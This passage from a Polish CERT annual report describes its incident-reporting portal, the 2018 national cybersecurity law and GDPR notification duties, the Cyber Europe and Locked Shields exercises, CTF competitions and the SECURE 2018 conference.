Portal nie zastępuje możliwości zgłasza-nia incydentów drogą e-mailową (na adres [email protected]), jednak rekomendujemy stosowa-nie go zwłaszcza wtedy, gdy zgłoszenie incyden-tu ma wypełnić obowiązek ustawowy.

Rysunek 1. Widok portalu incydent.cert.pl.

Przyciski “Operator usług kluczowych”, “Dostawca usługi cyfrowej” oraz “Podmiot publiczny” prowa-dzą do specjalnie przygotowanych formularzy, które umożliwiają zgłoszenie odpowiednio: incydentu poważnego, incydentu istotnego oraz incydentu w podmiocie publicznym.

Rolę starego formularza prowadzonego na stronie CERT Polska w nowym systemie przejęła za-kładka “Osoba fizyczna / inne podmioty”. Istotna zmiana polega na tym, że użytkownik nie jest już proszony o wybranie klasyfikacji incydentu zgodnie ze skomplikowaną, wewnętrzną listą katego-rii. Zamiast tego możliwe jest wybranie jednego z pięciu najpopularniejszych rodzajów incydentów albo zaznaczenie “Inne”. Adekwatnie do wybranej opcji, prezentowany formularz zawiera dodatkowe wskazówki dla zgłaszającego.


Rysunek 2. Wybór kategorii incydentu stosowanych w przypadku dobrowolnych zgłoszeń od osób fizycznych i podmiotów nieobjętych ustawą o KSC.

Istotne zmiany w prawie

W 2018 r. zaczęło obowiązywać kilka aktów prawnych, które wielu podmiotom wyznaczyły nowe obowiązki lub uregulowały działania zwią-zane z cyberbezpieczeństwem. Istotnie wpływa-ją one także na sposób i zakres działania CERT Polska. Dlatego poniżej przedstawiamy najważ-niejsze z nich, wraz ze wskazaniem konsekwen-cji wprowadzonych regulacji.

Więcej informacji, w tym bieżące analizy euro-pejskich i krajowych zmian w legislacji, i inicja-tyw w warstwie legislacyjno-politycznej można znaleźć na stronie https://cyberpolicy.nask.pl/ oraz raporcie “Cyberbezpieczeństwo A.D 2018”, stanowiącego podsumowanie ubiegłego roku w tym zakresie.

Ustawa o krajowym systemie cyberbezpieczeństwa

Ustawa o krajowym systemie cyberbezpieczeń-stwa to pierwszy akt prawny porządkujący ob-szar cyberbezpieczeństwa Polsce. Jest to imple-mentacja do porządku krajowego tzw. Dyrektywy NIS. Ponieważ Dyrektywa NIS jest harmoniza-cją minimalną, polski ustawodawca skorzystał z możliwości bardziej szczegółowej regula-cji. Dlatego w zakres ustawy została włączona

administracja publiczna. Ustawa o krajowym systemie cyberbezpieczeństwa obowiązuje od 28 sierpnia 2018 roku.Najważniejsze kwestie regulowane przez usta-wę to:1. Wprowadzenie obowiązkowego rapor-

towania incydentów przez operatorów usług kluczowych, dostawców usług cyfrowych i podmiotów publicznych (wię-cej informacji na ten temat: str. 14)

2. Wyznaczenie trzech CSIRT poziomu kra-jowego z jasno ustalonym zakresem od-powiedzialności.

3. Ustanowienie mechanizmu współpra-cy trzech CSIRT poziomu krajowego w przypadku tzw. incydentów krytycz-nych. Ustawa wprowadza formułę Zespo-łu ds. Incydentów Krytycznych, będącego organem pomocniczym w sprawach obsłu-gi incydentów krytycznych. W jego skład wchodzą CSIRT poziomu krajowego oraz Rządowe Centrum Bezpieczeństwa jako sekretariat – taka formuła zapewnia współ-pracę z Rządowym Zespołem Zarządzania Kryzysowego (RZZK). Dodatkowo do udzia-łu w pracach Zespołu mogą być zaprosze-ni przedstawiciele organów właściwych. Powołanie Zespołu ds. Incydentów Krytycz-


nych służy wyznaczeniu CSIRT, który będzie wiodącym w obsłudze incydentu krytyczne-go oraz podziałowi zadań związanych z tą obsługą. Na posiedzeniu może też zostać podjęta decyzja o wystąpieniu z wnioskiem do Prezesa Rady Ministrów w sprawie zwo-łania Rządowego Zespołu Zarządzania Kry-zysowego. Jest to zatem ujęcie problematyki cyberbezpieczeństwa w systemie zarządza-nia kryzysowego w Polsce.

4. Ustanowienie nadzoru nad operatora-mi usług kluczowych w poszczególnych sektorach gospodarki, którzy odpowiadają za wyznaczanie operatorów (na podstawie decyzji administracyjnej), przygotowywa-nie rekomendacji działań, które wzmocnią cyberbezpieczeństwo sektora, nadzór nad operatorami w danym sektorze, udział w ćwiczeniach oraz przetwarzanie danych osobowych niezbędnych do realizacji zadań.

5. Wprowadzenie formuły sektorowego ze-społu cyberbezpieczeństwa, powoływa-nego przez organy właściwe, który przyj-

muje zgłoszenia o incydentach i pomaga w ich obsłudze, ale również analizuje skut-ki, wypracowuje wnioski oraz współpracuje z właściwym CSIRT poziomu krajowego. Może też wymieniać informacje o incyden-tach poważnych z innymi krajami Unii Euro-pejskiej.

6. Wprowadzenie obowiązku przygotowy-wania pięcioletniej Strategii Cyberbez-pieczeństwa RP, która określa cele strate-giczne oraz odpowiednie środki polityczne i regulacyjne, pozwalające osiągnąć i utrzy-mać wysoki poziom cyberbezpieczeństwa. Strategia uwzględnia również priorytety, podmioty zaangażowane w jej wdrażanie oraz działania odnoszące się do programów edukacyjnych, informacyjnych, a także pla-nów badawczo-rozwojowych.

7. Wprowadzenie koordynacji strategiczno-politycznej nad systemem cyberbezpie-czeństwa w Polsce poprzez ustanowienie Pełnomocnika i Kolegium ds. Cyberbezpie-czeństwa.

Organ właściwy ds. cyberbezpieczeństwa Sektor/podsektor

Minister właściwy ds. energii Energia

Minister właściwy ds. transportu Transport

Minister właściwy ds. gospodarki morskiej i minister właściwy ds. żeglugi śródlądowej Transport wodny

Komisja Nadzoru Finansowego Bankowy, infrastruktura rynków finansowych

Minister właściwy ds. zdrowia Ochrona zdrowia

Minister właściwy ds. gospodarki wodnej Zaopatrzenie w wodę pitną i jej dystrybucja

Minister właściwy ds. informatyzacjiInfrastruktura cyfrowaDostawcy usług cyfrowych

Minister Obrony Narodowej (podmioty podległe MON oraz przedsiębiorcy o szczególnym znaczeniu gospodarczo-obronnym)

Ochrona zdrowia Infrastruktura cyfrowa Dostawcy usług cyfrowych

Tabela 4. Przyporządkowanie organów właściwych do sektorów gospodarki wg ustawy o krajowym systemie cyberbezpieczeństwa.


RozporządzenieoOchronieDanychOsobowych

RODO/GDPR zostało przyjęte 27 kwietnia 2016 r. i zastąpi Dyrektywę 95/46/WE z 24 październi-ka 1995 r. w sprawie ochrony osób fizycznych w zakresie przetwarzania danych osobowych i swobodnego przepływu tych danych. Zgodnie z prawem UE, Rozporządzenie ma zasięg ogól-ny. Oznacza to, że wiąże w całości i jest bez-pośrednio stosowane we wszystkich państwach członkowskich. Co za tym idzie: implementacja do porządku prawnego nie jest niezbędna, a od 28 maja 2018 r. RODO obowiązuje w całej UE.

GDPR reguluje nie tylko przetwarzanie danych osobowych wewnątrz Unii Europejskiej, ale od-nosi się również do przekazywania danych oso-bowych poza terytorium UE. Dodatkowo regula-cją zostali objęci także administratorzy danych spoza Unii, prowadzący swoją działalność na te-rytorium UE (m.in. amerykańskie firmy takie jak Facebook). GDPR w znaczący sposób zwiększa kontrolę osób fizycznych nad dotyczącymi ich danymi. GDPR wprowadza także administracyjne kary finansowe za nieprzestrzeganie przepisów.

GDPR a zespoły CERT/CSIRT

Zgodnie z treścią rozporządzenia mianem ad-ministratora określa się właściwy organ, który samodzielnie lub wspólnie z innymi ustala cele i sposoby przetwarzania danych osobowych, na-tomiast podmiot przetwarzający oznacza osobę fizyczną lub prawną, organ publiczny, jednostkę organizacyjną lub inny podmiot, który przetwa-rza dane osobowe w imieniu administratora.

Zatem zespół CSIRT/CERT jest administratorem w momencie, gdy przetwarza dane na podstawie otrzymanego mandatu. W przypadku, gdy zespół CSIRT/CERT działa w imieniu organów ścigania lub innych zespół CSIRT/CERT (np. poprzez za-pewnienie pomocy technicznej), pełni także rolę podmiotu przetwarzającego, ponieważ nie decy-duje bezpośrednio o celach i sposobach prze-twarzania danych osobowych.

Udostępnianie i wymianę informacji pomiędzy zespołami CSIRT również można uznać za prze-twarzanie danych osobowych. Oznacza to, że w zakresie zgłaszania incydentów zespoły typu CSIRT podlegają dwóm reżimom: temu wprowa-dzonemu przez Dyrektywę NIS i temu właściwe-mu RODO. Poniższe tabele prezentują wyma-gania w zakresie notyfikacji incydentów dla obu aktów prawnych.

RODO

Rodzaj incydentu Podmiot notyfikujący Odbiorca zgłoszenia Termin

Naruszenie danych osobowych

Podmiot przetwarzający Administrator Bez zbędnej zwłoki

Naruszenie danych osobowych Administrator Właściwy organ

ochrony danych

Bez zbędnej zwłoki, w miarę możliwości

do 72 godzin od momentu otrzymania

zgłoszenia

Naruszenie danych osobowych z dużym ryzykiem zagrożenia dla praw i wolności

osób fizycznych

Administrator Osoby, których dane dotyczą Bez zbędnej zwłoki

Tabela 5. Wyma gania w zakresie notyfikacji incydentów w świetle RODO.


W związku z tym warto zadbać o właściwe przy-gotowanie nie tylko w zakresie implementacji Dyrektyw NIS, ale i RODO, oraz dokonać do-kładnej oceny zakresu w jakim zespół CSIRT może dokonywać przetwarzania danych osobo-wych w obrębie własnego zakresu odpowiedzial-ności, a także czy jest procesorem (przetwarza dane osobowe) czy administratorem. Konieczne jest także dokumentowanie sposobu zbierania, przechowywania i przetwarzania danych oso-

bowych, dokładnej analizy okresu i zasad prze-chowywania danych roboczych, anonimizacji danych osobowych, gdzie istnieje konieczność uzyskania zgody osoby, której te dane dotyczą. Natomiast w czasie procesu przekazywania da-nych konieczna będzie ocena nie tylko zakresu odpowiedzialności swojego zespołu CSIRT, ale także CSIRT, któremu dane te mają być przeka-zywane.

Ćwiczeniaikonkursymiędzynarodowe

CERT Polska regularnie uczestniczy w mię-dzynarodowych ćwiczeniach sprawdzających zarówno umiejętności technicznej analizy za-grożeń, jak i testujących procedury reagowania na incydenty w kontekście międzynarodowym. Najważniejszymi z nich są coroczne ćwiczenia defensywne Locked Shields oraz organizowane raz na dwa lata Cyber Europe. W 2018 r. po raz pierwszy przygotowywaliśmy także polską re-prezentację, która brała udział w europejskich zawodach European Cyber Security Challenge.

Cyber Europe 2018

Cykl ćwiczeń „Cyber Europe” to symulacja sytu-acji kryzysowych w skali europejskiej. Organiza-torem jest Europejska Agencja ds. Bezpieczeń-stwa Sieci i Informacji (ENISA). Cyber Europe mają formułę ćwiczeń sztabowych, w których uczestnicy testują procedury operacyjne i sce-nariusze przygotowane na wypadek wystąpienia dużych incydentów.

Celem ćwiczeń „Cyber Europe” jest testowanie procedur zarządzania kryzysowego w obliczu międzynarodowego kryzysu w cyberprzestrzeni (w sieciach i systemach komputerowych) – za-równo tych wewnętrznych (w poszczególnych organizacjach na poziomie państw członkow-skich i w poszczególnych sektorach), jak rów-nież procedur na poziomie europejskim (tzw. SOP – Standard Operating Procedures).

W dziedzinie cyberbezpieczeństwa jest to szczególnie istotne, ponieważ kryzysy w cy-berprzestrzeni mają potencjał przerodzenia się w realne zagrożenia fizyczne (np. brak prądu, problemy z łącznością). W takiej sytuacji ko-nieczna jest sprawna współpraca zespołów re-agowania na incydenty bezpieczeństwa kom-puterowego (CERT lub CSIRT) z zespołami i centrami zarządzania kryzysowego oraz zespo-łami medialnymi, a także z administracją publicz-ną i sektorem prywatnym (każda edycja dotyczy innego sektora gospodarki).

Dyrektywa NIS

Rodzaj incydentu Podmiot notyfikujący Odbiorca zgłoszenia Termin

Incydent mający znaczny wpływ na

ciągłość usług kluczowych

Operatorzy usług kluczowych

Właściwy organ ochrony danych

lub zespół CSIRTBez zbędnej zwłoki

Incydent mający znaczny wpływ na świadczenie usługi

Dostawcy usług cyfrowych

Właściwy organ ochrony danych

lub zespół CSIRTBez zbędnej zwłoki

Tabela 6. Wyma gania w zakresie notyfikacji incydentów w świetle Dyrektywy NIS.


Pierwsza edycja ćwiczeń “Cyber Europe” odbyła się w 2010 r. Dwa lata później ćwiczenia doty-czyły sektora bankowego, w 2014 r. – sektora energetycznego i telekomunikacyjnego. Nato-miast w 2016 roku w ćwiczeniu wzięli udział dostawcy Internetu i firmy z sektora bezpieczeń-stwa IT. Obecna, piąta edycja z czerwca 2018 r., dotyczyła sektora lotnictwa cywilnego.

Procedury wypracowane przez państwa człon-kowskie i ENISA w poprzednich edycjach stały się podstawą (tzw. blueprint) zaleceń Komisji Europejskiej w sprawie skoordynowanego re-agowania na incydenty i kryzysy na dużą skalę. Zalecenia zawierają ramowe procedury i organi-zację współpracy europejskiej na poziomie stra-tegicznym, a także operacyjnym.

Skalę ćwiczenia najlepiej zobrazować liczba-mi. W obecnej edycji uczestniczyło 30 państw z Unii Europejskiej i Europejskiego Stowarzy-szenia Wolnego Handlu oraz 10 instytucji unij-nych, zajmujących się cyberbezpieczeństwem i działających w sektorze lotnictwa cywilnego. Łącznie ćwiczyło 300 organizacji i 900 zespo-łów lub specjalistów z dziedziny bezpieczeństwa w cyberprzestrzeni, zarządzania kryzysowego i komunikacji społecznej. Uczestnicy w ciągu dwóch dni otrzymali ponad 23 tysiące wiadomo-ści ćwiczebnych.

Przedstawicielami Polski byli: NASK – Pań-stwowy Instytut Badawczy z działającym w nim zespołem CERT Polska, administracja publiczna reprezentowana przez Rządowe Cen-trum Bezpieczeństwa, Ministerstwa: Cyfryza-cji i Infrastruktury, Urząd Lotnictwa Cywilnego, a także kontrola ruchu lotniczego, podmioty z sektora lotnictwa cywilnego, dostawca sieci telekomunikacyjnej oraz stowarzyszenie Polska Obywatelska Cyberobrona. Łącznie 18 zespołów z 10 organizacji.

Podczas dwudniowego ćwiczenia polscy uczest-nicy, wymienili między sobą ponad 500 wiado-mości mailowych. Oprócz tego komunikowali się telefonicznie, a w sprawach technicznych (m.in. rozwiązywanie incydentów bezpieczeństwa komputerowego) za pośrednictwem formularza i komunikatora internetowego przygotowanego przez CERT Polska. Ta liczba nie obejmuje tak-że komunikacji wewnętrznej w obrębie uczestni-czących w zawodach organizacji.

Reakcją na symulowane wydarzenia były rów-nież sporządzane przez uczestników krótkie analizy dla kierownictwa organizacji oraz roz-mowy telefoniczne z przedstawicielami ćwiczeb-nych redakcji mediów informacyjnych.

Kontrola i koordynacja ćwiczenia wymagała ok. 150 wiadomości elektronicznych, dziesiątek rozmów telefonicznych i bieżącej komunikacji pomiędzy moderatorami i administratorami na czacie internetowym. Koordynacja i kontrola to przede wszystkim czuwanie nad przebiegiem ćwiczenia, działaniem platformy ćwiczebnej – funkcjonowaniem wirtualnego świata i rozwiązy-wanie kwestii technicznych. Moderatorzy pełnili także rolę uzupełniającą dla scenariusza, ale in-terweniowali tylko w przypadkach szczególnych, m.in. wtedy, gdy do reakcji na zdarzenie ze sce-nariusza potrzebne były działania lub decyzje podmiotu, który nie brał udziału w ćwiczeniu.

Konstrukcja scenariusza zawierała incydenty bezpieczeństwa w sieciach i systemach kom-puterowych, ataki hybrydowe (zagrożenie bez-pieczeństwa fizycznego, akcje medialne i dezin-formację), które materializowały się poprzez zdarzenia w podmiotach sektora lotnictwa cy-wilnego i zarządzania kryzysowego. Scenariusz zawierał także potencjalne zagrożenia dla innych sektorów gospodarki, które mogły rozprzestrze-nić się za pośrednictwem sieci, wraz z eskalacją incydentu. Jednym z celów ćwiczenia było spraw-dzenie czy istniejące mechanizmy współpracy na poziomie europejskim w wystarczającym za-kresie adresują potrzeby państw członkowskich. Testowane były plany zarządzania kryzysowego i zapewnienia ciągłości działania na wszystkich poziomach: organizacji, sektora, kraju oraz eu-ropejskiego obszaru gospodarczego.

Na poziomie medialnym, scenariusz miał spraw-dzić gotowość sektora lotniczego w zakresie obrony przed dezinformacją i skoordynowania komunikatu medialnego, informującego społe-czeństwo o zaistniałym kryzysie.

Istotnym elementem ćwiczenia były zdarzenia techniczne, wymagające od wyspecjalizowanych zespołów reagowania na incydenty bezpieczeń-stwa komputerowego przeprowadzania m.in. analiz powłamaniowych, analiz próbek złośliwe-go oprogramowania, powstrzymywania ataków z wykorzystaniem „internetu rzeczy”, zautoma-tyzowanej analizy informacji z otwartych źródeł.


Zdarzenia techniczne składały się na incydenty, a usuwanie skutków tych zdarzeń decydowało o skutecznej odpowiedzi na kryzys.

Wnioski i rekomendacje z ćwiczenia zostały opracowane na przełomie października i listo-pada 2018 roku. Uzgodniona na poziomie euro-pejskim treść raportu została przekazana koor-dynatorom krajowym i uczestnikom ćwiczenia. Publicznie dostępna część raportu z organizacji i przebiegu ćwiczenia, jest dostępna na stronie ENISA5. Na stronie dostępne są także raporty z poprzednich edycji Cyber Europe. Należy przy tym zaznaczyć, że większość obserwacji i wniosków nie jest publikowana. Stanowią one informację prawnie chronioną – informacje nie-jawne administracji publicznej oraz tajemni-ce handlowe przedsiębiorstw biorących udział w ćwiczeniu. Ćwiczenia były doskonałą okazją do przetrenowania działania punktów kontakto-wych do spraw cyberbezpieczeństwa i ich współ-działania z centrami zarządzania kryzysowego. W zakresie procedur na poziomie krajowym, prze-testowane zostało współdziałanie NASK i RCB w inicjowaniu Zespołu ds. incydentów krytycznych i jego relacji do Rządowego Zespołu Zarzą-dzania Kryzysowego. Działanie to było jednym z celów krajowych ćwiczeń i pozwoliło na spraw-dzenie jednego z zakładanych wariantów reago-wania na incydenty i ich eskalowania z poziomu organizacji na poziom krajowy. Doświadczenia zostały wykorzystane przy tworzeniu kolejnej aktualizacji planów zarządzania kryzysowego. Sektorowo, w zakresie proceduralnym i tech-nicznym, sprawdzone zostało współdziałanie podmiotów cyberbezpieczeństwa i bezpieczeń-stwa lotnictwa cywilnego w odpieraniu złożone-go zagrożenia – przebiegającego w cyberprze-strzeni, ale mającego realny, fizyczny skutek dla podmiotów lotnictwa cywilnego. Zauważono braki i mankamenty, szczególnie w komunikacji i bieżącej wymianie informacji. Większa ich część wynikała z faktu, że wykorzystywano procedury ćwiczebne powstałe na podstawie projektu ustawy, bez wykorzystania rozwiązań wynikających z przepisów wykonawczych. Braki dotyczyły głównie strony technicznej i organiza-cyjnej kanałów komunikacyjnych, wykorzystywa-nych do tej pory rzadko lub w ogóle (sieć CSIRT, Pojedynczy Punkt Kontaktowy, zespół ds. incy-dentów krytycznych). Dzięki wnioskom z ćwicze-nia, stwierdzone niedociągnięcia usuwane są na bieżąco przy budowie krajowego systemu cyber-bezpieczeństwa.

Locked Shields 2018

Locked Shields to największe na świecie tech-niczne ćwiczenia cyberbezpieczeństwa. Organi-zowane są corocznie już od 2010 r. przez NATO CCDCOE - sojusznicze Centrum Doskonałości ds. Współpracy w dziedzinie Cyberbezpieczeństwa z siedzibą w Estonii. Zespoły “niebieskich” będące reprezentacjami krajów-członków CCDCOE pod-czas ćwiczenia pełnią rolę zespołów szybkiego reagowania fikcyjnego kraju “Berylia”. Do ochro-ny przed zespołem “czerwonych” były nie tylko standardowe systemy i usługi teleinformatyczne, ale także wyspecjalizowane systemy wojskowe oraz systemy informatyki przemysłowej (SCADA). Do zadań “niebieskich” oprócz działań defensyw-nych - zabezpieczania sieci, wykrywania i zapo-biegania ataków pod presją czasu należało także raportowanie zagrożeń w ramach współpracy mię-dzynarodowej. Równolegle do części technicznej odbywa się część strategiczna, w której sprawdza się zdolności podejmowania decyzji strategiczno-politycznych, możliwości analiz prawnych oraz komunikacji zewnętrznej.

O niezwykle dużej skali wydarzenia świadczy to, że infrastruktura, której bronił każdy z zespołów “niebieskich”, stworzona była z ponad 150 syste-mów informatycznych, a ilość przeprowadzonych na nie ataków przekroczyła w sumie 2500. W rolę “niebieskich” wcieliło się 15 zespołów narodowych, 5 zespołów łączonych oraz 2 zespoły reprezentu-jące CERT Unii Europejskiej oraz NATO. W sumie w ćwiczeniach uczestniczyło ponad 1000 eksper-tów z 30 krajów. Wygrał zespół NATO składający się z 30 ekspertów różnych instytucji tej organiza-cji, drugie miejsce zajął zespół narodowy Francji, a trzecie z Czech.

Rysunek 3. Sterowniki przemysłowe będące częścią systemu zarządzania energią elektryczną.

5 https://www.enisa.europa.eu/publications/cyber-europe-2018-after-action-report6 https://ccdcoe.org/exercises/locked-shields/


Nowościami technicznymi w 2018 r. było włą-czenie do ochranianej przez zespoły “niebie-skich” infrastruktury informatycznych systemów zarządzania siecią energetyczną oraz syste-mów składających się na w pełni funkcjonalną sieć komórkową 4G. Natomiast stałym elemen-tem ćwiczeń są systemy przemysłowe (w 2018 w postaci infrastruktury krytycznej systemu uzdatniania wody) czy systemy sterujące woj-skowymi dronami obserwacyjnymi.

Polski zespół, pod przewodnictwem Narodowe-go Centrum Kryptologii, składał się z ekspertów zarówno wojskowych, jak i cywilnych instytucji, którzy na co dzień zajmują się ochroną kluczo-wej dla Polski infrastruktury. Ćwiczenia Locked Shields są okazją do zbudowania efektywnej formy współpracy na okoliczność ewentualnego zagrożenia.

European Cyber Security Challenge

Decyzja o zainicjowaniu przez Komisję Euro-pejską międzynarodowych zawodów bezpie-czeństwa teleinformatycznego została podjęta już w 2013 r.7 Rok później, w nowym konkur-sie wzięły udział trzy kraje - Austria, Niemcy i Szwajcaria. Cztery lata później, w finałach w 2018 r.8, pod auspicjami Europejskiej Agencji ds. Bezpieczeństwa Sieci i Informacji (ENISA) rywalizowały ze sobą reprezentacje większo-ści krajów Unii Europejskiej. W tej edycji po raz pierwszy udział wzięła także Polska.

Celem zawodów jest zwrócenie uwagi na brak wystarczającej liczby specjalistów bezpieczeń-stwa teleinformatycznego oraz pokazanie mło-dzieży legalnej formy nauki i rywalizacji. Przy okazji finałów odbywają się zazwyczaj otwarte targi pracy. Ideą konkursu jest również stwo-rzenie możliwości nawiązania kontaktów oraz podniesienie świadomości zagrożeń cyberbez-pieczeństwa.

Każda z narodowych reprezentacji biorących udział w European Cyber Security Challenge musi składać się z 10 członków - 5 juniorów w wieku od 14 do 20 lat i 5 seniorów w wieku od 21 do 25 lat. Każdy kraj wyłania reprezentacje we własnym zakresie. Opiekę nad polską reprezen-tacją sprawował NASK. Została ona wyłoniona w krajowych kwalifikacjach przeprowadzonych w ramach dwóch internetowych konkursów CTF. W czerwcu 2018 r. na platformie hack.cert.pl prawie 100 uczestników zmagało się z ponad 20 zadaniami w każdej z kategorii wiekowych. Zadania z kwalifikacji są cały czas dostępne na platformie - zachęcamy do spróbowania swoich sił.

Polska reprezentacja składała się zarówno ze studentów pierwszych lat studiów informatycz-nych jak i z młodych, ale już uznanych ekspertów światowych firm technologicznych. Reprezen-tanci mieli okazję poznać się lepiej na spotkaniu w siedzibie NASK.

Każdego roku, rozgrywki finałowe organizo-wane są przez jeden z krajów uczestniczących w zawodach. W 2018 r. odbyły się w paździer-niku w Londynie. Po dwóch dniach zmagań, Polska zajęła ostatecznie 4. miejsce z niewielką stratą tuż za Wielką Brytanią, wyprzedzając 13 innych zespołów. Zawody wygrała reprezenta-cja Niemiec, a drugie miejsce zajęła Francja. Po zawodach, gratulacje polskiej ekipie przekazał osobiście polski ambasador Arkady Rzegocki.

W 2019 r. finały odbędą się w Rumunii.

Rysunek 4. Polska reprezentacja na finałach ECSC w Londynie.

7 https://www.enisa.europa.eu/about-enisa/structure-organization/national-liaison-office/meetings/april-2017/2017-04-26-ecsc-brief.pdf8 https://www.enisa.europa.eu/events/european-cyber-security-challenge-ecsc-2018


Scena CTF

Konkursy Capture The Flag (“Zdobyć flagę”) to drużynowe zawody bezpieczeństwa teleinforma-tycznego. Organizowane są niezależnie przez uczelnie, rządy państw, organizacje i przede wszystkim same drużyny. Nieustannie zyskują na popularności, ponieważ dają możliwość po-znania istotnych zagadnień bezpieczeństwa IT w legalny sposób, jak również są formą zdrowego współzawodnictwa. W 2018 roku, według strony “ctftime.org”9 agregującej rankingi zawodów oraz drużyn, odbyło się blisko 150 konkursów.

Zawody CTF można skategoryzować według formy i miejsca rozgrywki. Najpopularniejsza for-muła to “jeopardy”, w której drużyny rozwiązują od kilkunastu do kilkudziesięciu zadań o róż-

nej trudności w kilku kategoriach: bezpieczeń-stwo aplikacji internetowych, inżynieria wstecz-na, kryptografia, wykorzystywanie podatności w aplikacjach czy informatyka śledcza. Rozwią-zaniem w każdym zadaniu jest “flaga”, którą na platformie konkursowej drużyny wymieniają na punkty. Natomiast w formule “attack/defense” każda z drużyn otrzymuje dostęp do kopii ser-wera, na którym uruchomione są przygotowane przez organizatorów zadania w postaci usług sieciowych. Zespoły muszą znaleźć błędy w apli-kacjach, naprawić je oraz regularnie wykradać flagi pozostałym drużynom. Zawody dzielą się również na te organizowane w internecie (naj-częściej w formie “jeopardy”) oraz na miejscu, a także w formule mieszanej - internetowe kwali-fikacje i lokalne finały.

Sezon 2018 okazał się bardzo udany dla polskich drużyn10. Dragon Sector wygrał rozgrywki, a ze-spół p4 uznał wyższość tylko zespołu PPP z amerykańskiego uniwersytetu Carnegie Mellon. Cało-roczny ranking drużynowy liczony jest na podstawie 10 najlepszych występów drużyny, choć więk-szość z nich bierze udział w kilkudziesięciu wydarzeniach w ciągu roku. W obu polskich topowych zespołach grają obecni i byli pracownicy CERT Polska. Na pozycjach 36 i 40 uplasowały się kolejno studenckie zespoły Made in MIM z Uniwersytetu Warszawskiego oraz Just Cat The Fish wywodzący się z Akademii Górniczo-Hutniczej.

9 https://ctftime.org10 https://ctftime.org/stats/2018

Wraz ze wzrostem popularności konkursów, rosną także pule nagród. W 2018 r. najbardziej prestiżowe konkursy mogły pochwalić się wysokimi sumami nagród, w tym szwajcarski Insomni’hack (4 kilogramy sztab srebra), tajwański HITCON CTF (8 tys. USD), Google CTF w Londynie (15 tys.), rosyjski CTFZo-ne (17 tys.) czy chińskie 0CTF (40 tys.), WCTF (100 tys.) oraz Real World CTF (150 tys.).

Rysunek 5. Podium rankingu za 2018 r. (źródło: ctftime.org).

Rysunek 6. Finały Insomni’hack w Genewie. (źródło: SCRT.ch.).


W 2018 r. również w Polsce odbywały się za-wody i konkursy w formule CTF. Jednym z naj-ważniejszych, wysoko klasyfikowany w rankingu “ctftime.org”, był Dragon CTF (z pulą nagród 17 tys. złotych) zorganizowany przez Dragon Sector przy okazji konferencji PWNing 2018 w Warszawie wraz z jego internetową zapowie-dzią - “teaserem”. W jego finałach zwyciężył11 paneuropejski zespół tasteless, drugie miejsce zajęło p4, trzecie węgierski zespół SpamAn-dHex, a tuż za podium uplasowało się Just Cat The Fish. Wojsko Polskie z kolei zorganizowa-ło konkurs podczas hackathonu Hack Yeah pod

koniec listopada. Dwuosobowe drużyny walczyły aż o 60 tysięcy złotych oraz dodatkowe, prak-tyczne nagrody.

CERT Polska w 2018 r. zorganizował dwa wyda-rzenia CTF-owe - krajowe kwalifikacje do repre-zentacji Polski na finały European Cyber Securi-ty Challenge w czerwcu oraz konkurs w ramach Europejskiego Miesiąca Bezpieczeństwa w paź-dzierniku. Oba opisujemy szerzej w artykułach na stronach: 24 oraz 27. Opublikowaliśmy rów-nież artykuł o technicznych aspektach organiza-cji zawodów CTF12.

SECURE 2018

W dniach 23-24 października 2018 r. odbyła się 22. edycja konferencji SECURE organizowanej przez CERT Polska, NASK Państwowy Instytut Badawczy oraz NASK S.A. Wzięło w niej udział ponad 600 gości z kraju i zagranicy. W progra-mie znalazły się wystąpienia 50 prelegentów, którzy prezentowali zróżnicowane tematy.

Część merytoryczną konferencji rozpoczęła dr Aleksandra Przegalińska (Akademia Leona Koźmińskiego, MIT) z wprowadzeniem do te-matyki kierunków rozwoju sztucznej inteligencji i zagrożeń związanych z jej wykorzystaniem. Problematyka sztucznej inteligencji, a także te-maty jej pokrewne, takie jak uczenie maszynowe czy systemy autonomiczne, przewijała się także w dalszych prezentacjach. Filip Konopczyński i Urszula Rybicka z NASK PIB przedstawili wy-niki badań dotyczących zastosowania AI w prze-myśle, z kolei Kamil Frankowicz (CERT Polska) mówił o wykorzystaniu uczenia maszynowego w analizie złośliwego oprogramowania. Dwie prezentacje dotyczyły zagrożeń związanych z systemami inteligentnymi instalowanymi w samochodach – pierwszą z nich wygłosił Inbar Raz, drugą Stefan Tanase wspólnie Gabrielem Cirligiem (Ixia).

Z dużym zainteresowaniem spotkał się blok poświęcony mechanizmom manipulacji infor-macjami, w tym rozprzestrzeniania fałszywych informacji, a w szczególności żywiołowa prezen-tacja „Informacyjne supermutanty” dr. hab. Mar-cina Napiórkowskiego (Uniwersytet Warszawski, Mitologia współczesna).

Nie zabrakło także wystąpień poświęconych technicznym badaniom i projektom CERT Polska oraz NASK PIB („Jak zorganizować CTF i prze-trwać, czyli organizacja konkursów dla hake-rów z perspektywy admina” Michała Leszczyń-skiego, „Obserwacje złośliwych aktywności w teleskopie sieciowym - od wykrywania ata-ków DoS do fingerprintowania botnetów” Piotra Bazydło czy „Monitorowanie w skali kraju i nie tylko” Pawła Pawlińskiego).

Podczas konferencji odbyła się debata po-święcona wpływowi nowych regulacji wpro-wadzonych ustawą o krajowym systemie cy-berbezpieczeństwa na biznes, administrację i obywateli. Wprowadzeniem do debaty była pre-zentacja Krzysztofa Silickiego, Dyrektora NASK ds. Cyberbezpieczeństwa i Innowacji.

Prezentacje z SECURE 2018 dostępne są pod adresem https://goo.gl/h6hmWE

11 https://twitter.com/DragonSectorCTF/status/106503629301559296012 https://www.cert.pl/news/single/techniczne-aspekty-organizacji-zawodow-i-cwiczen-ctf/


Rysunek 7. Wystąpienie dr Aleksandry Przegalińskiej podczas SECURE 2018.

Jednak SECURE to nie tylko coroczna jesienna konferencja. 23 maja 2018 r. odbyło się wyda-

rzenie pod nazwą „SECURE Early Bird”, które skupiło się wyłącznie na aspektach technicznych i praktycznych. Wydarzenie dotyczyło detekcji mechanizmów wirtualizacji przez złośliwe opro-gramowanie (Carsten Willems, VMRay), fuzzin-gu interpreterów w poszukiwaniu podatności (Kamil Frankowicz, CERT Polska), przeszukiwa-nia dużych zbiorów złośliwego oprogramowania (Jarosław Jedynak) oraz podatności w optyma-lizacji procesorów (Michał Leszczyński, CERT Polska).

Pod marką SECURE odbyliśmy także w ciągu roku cykl spotkań z przedstawicielami biznesu, poszukując synergii w działaniach na rzecz edu-kacji oraz sposobów wykorzystania możliwości CERT Polska i NASK PIB w realnym budowaniu krajowego systemu cyberbezpieczeństwa.

EuropejskiMiesiącCyberbezpieczeństwa

